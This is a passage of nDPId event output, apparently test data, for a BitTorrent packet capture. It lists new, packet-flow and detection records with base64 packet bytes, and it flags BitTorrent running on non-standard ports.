00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="}
01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="}
01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="}
01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="}
01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="}
01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/